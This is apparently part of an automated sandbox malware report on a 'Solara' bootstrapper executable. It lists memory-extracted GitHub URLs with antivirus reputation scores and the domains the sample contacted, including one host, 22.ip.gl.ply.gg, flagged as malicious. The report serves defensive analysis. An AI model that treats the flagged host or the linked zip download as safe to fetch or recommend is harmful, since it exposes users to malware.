                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b0%VirustotalBrowse
                  https://github.com/solutions/devsecops1%VirustotalBrowse
                  https://github.com/features/code-review0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_0%VirustotalBrowse
                  https://user-images.githubusercontent.com/0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-0%Avira URL Cloudsafe
                  https://github.com/features/issues0%VirustotalBrowse
                  https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png0%Avira URL Cloudsafe
                  https://skills.github.com0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%Avira URL Cloudsafe
                  https://user-images.githubusercontent.com/0%VirustotalBrowse
                  https://github.com/solutions/industries/manufacturing0%Avira URL Cloudsafe
                  https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-1%VirustotalBrowse
                  https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_0%Avira URL Cloudsafe
                  https://api.github.com/_private/browser/stats0%Avira URL Cloudsafe
                  https://github.com/solutions/industries/manufacturing1%VirustotalBrowse
                  https://github.com/features0%VirustotalBrowse
                  https://skills.github.com0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_gith0%Avira URL Cloudsafe
                  https://api.github.com/_private/browser/stats0%VirustotalBrowse
                  https://github.com/solutions/devops0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_1%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_gith1%VirustotalBrowse
                  https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_0%VirustotalBrowse
                  https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css0%VirustotalBrowse
                  https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/primer-9f7b2e63c497.css0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js0%Avira URL Cloudsafe
                  https://github.com/solutions/devops1%VirustotalBrowse
                  https://github.com/te0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e0%Avira URL Cloudsafe
                  https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;1%VirustotalBrowse
                  https://github.githubassets.com/assets/primer-9f7b2e63c497.css0%VirustotalBrowse
                  http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e0%VirustotalBrowse
                  https://docs.github.com/get-started/accessibility/keyboard-shortcuts0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js0%VirustotalBrowse
                  https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d10%Avira URL Cloudsafe
                  https://github.com/te0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_0%VirustotalBrowse
                  https://github.com/features/packages0%Avira URL Cloudsafe
                  https://docs.github.com/get-started/accessibility/keyboard-shortcuts0%VirustotalBrowse
                  https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js0%VirustotalBrowse
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png0%VirustotalBrowse
                  https://github.com/features/packages0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/ui_packages_updatable-content_upd0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu0%Avira URL Cloudsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j0%Avira URL Cloudsafe
                  https://resources.github.com/learn/pathways0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d10%VirustotalBrowse
                  https://github.com/trending0%Avira URL Cloudsafe
                  https://raw.githubusercontent.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  22.ip.gl.ply.gg
                  		147.185.221.22
                  		truetrueunknown
                  github.com
                  		140.82.121.4
                  		truefalseunknown
                  raw.githubusercontent.com
                  		185.199.109.133
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  22.ip.gl.ply.ggtrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038bSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/solutions/industries/financial-servicesSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_jSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browserSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/github-mark-57519b92ca4e.pngSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_moSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/solutions/devsecopsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/customer-storiesSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/readmeSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/element-registry-ee3b4c180fee.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/features/code-reviewSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/featuresSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/features/issuesSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://user-images.githubusercontent.com/SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.pngSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://skills.github.comSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/solutions/industries/manufacturingSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.github.com/_private/browser/statsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1708078820.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1873584903.000001B390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2035739099.00000243405D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2242695799.000002DC7232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_githSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/solutions/devopsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1705141692.0000000005061000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2914277285.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC622C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499A41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.githubassets.com/assets/primer-9f7b2e63c497.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/teSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_eSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000001.00000002.1705141692.000000000584A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1705141692.00000000059BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.micpowershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.githubassets.com/assets/github-octocat-13c86b8b336d.pngSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://docs.github.com/get-started/accessibility/keyboard-shortcutsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/features/packagesSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
